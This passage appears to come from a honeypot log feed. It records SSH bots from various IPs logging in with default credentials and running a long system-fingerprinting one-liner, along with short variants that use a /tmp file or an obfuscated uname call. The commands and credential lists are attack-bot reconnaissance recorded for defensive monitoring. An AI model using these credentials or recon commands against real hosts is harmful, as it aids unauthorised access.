"CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 pretzel_root_20 (138.68.98.184) — Frankfurt am Main, Germany · 3 sessions · 12 cmds

2026-03-02 00:38 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 tiger_root_12 (139.59.34.163) — Bengaluru, India · 4 sessions · 16 cmds

2026-03-02 00:37 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 lotus_root_18 (143.110.184.128) — Bengaluru, India · 1 session · 4 cmds

2026-03-02 00:41 EST · as root/1234

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 phantom_root_50 (159.223.36.209) — Singapore, Singapore · 1 session · 4 cmds

2026-03-02 00:32 EST · as root/admin123

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 cowboy_root_17 (162.243.225.28) — Secaucus, United States · 4 sessions · 16 cmds

2026-03-01 23:57 EST · as admin/123456, admin/admin, root/1234

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 barbie_root_4 (209.38.89.210) — Sydney, Australia · 12 sessions · 48 cmds

2026-03-01 23:11 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 12x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×12

$ uname -s -v -n -m 2 > /dev/null ×12

$ uname -m 2 > /dev/null ×12

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×12

🎭 star_root_25 (129.212.187.248) — Douglasville, United States · 8 sessions · 32 cmds

2026-03-01 23:55 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 outback_root_2 (209.38.23.112) — Sydney, Australia · 5 sessions · 20 cmds

2026-03-01 23:16 EST · as admin/admin, admin/admin123, admin/password

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 windmill_sol_4 (64.227.77.11) — Amsterdam, Netherlands · 3 sessions · 3 cmds

2026-03-01 23:51 EST · as sol/sol, solv/solv, ubuntu/ubuntu

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×3

↳ obfuscated system check

🎭 specter_root_21 (152.42.228.2) — Singapore, Singapore · 7 sessions · 28 cmds

2026-03-01 23:02 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 hockey_root (143.110.213.136) — Toronto, Canada · 10 sessions · 40 cmds

2026-03-01 22:34 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 spice_root_18 (167.71.234.98) — Bengaluru, India · 5 sessions · 20 cmds

2026-03-01 23:25 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 dutch_root_3 (206.189.2.179) — Amsterdam, Netherlands · 4 sessions · 16 cmds

2026-03-01 23:07 EST · as admin/admin123, root/1234, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 crumpet_root_2 (159.65.29.137) — Slough, United Kingdom · 21 sessions · 84 cmds

2026-03-01 20:04 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 21x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×21

$ uname -s -v -n -m 2 > /dev/null ×21

$ uname -m 2 > /dev/null ×21

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×21

🎭 bike_root_15 (138.124.79.52) — Amsterdam, Netherlands · 3 sessions · 3 cmds

2026-03-01 21:06 EST · as root/12345678, root/admin, root/pass123

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ cd /tmp ; echo uname -a > monaco ; chmod 777 monaco ; ./monaco ×3

↳ make executable (world)

🎭 dutch_root_14 (206.189.108.246) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-03-01 20:07 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 stroopwafel_root_12 (34.91.124.117) — Groningen, Netherlands · 1 session · 4 cmds

2026-03-01 19:54 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 stein_root_13 (46.101.141.205) — Frankfurt am Main, Germany · 9 sessions · 36 cmds

2026-03-01 19:07 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 pretzel_root_21 (64.226.101.25) — Frankfurt am Main, Germany · 8 sessions · 32 cmds

2026-03-01 19:07 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 scone_root_3 (143.110.160.208) — Slough, United Kingdom · 9 sessions · 36 cmds

2026-03-01 18:35 EST · as deploy/deploy, guest/guest, mysql/mysql

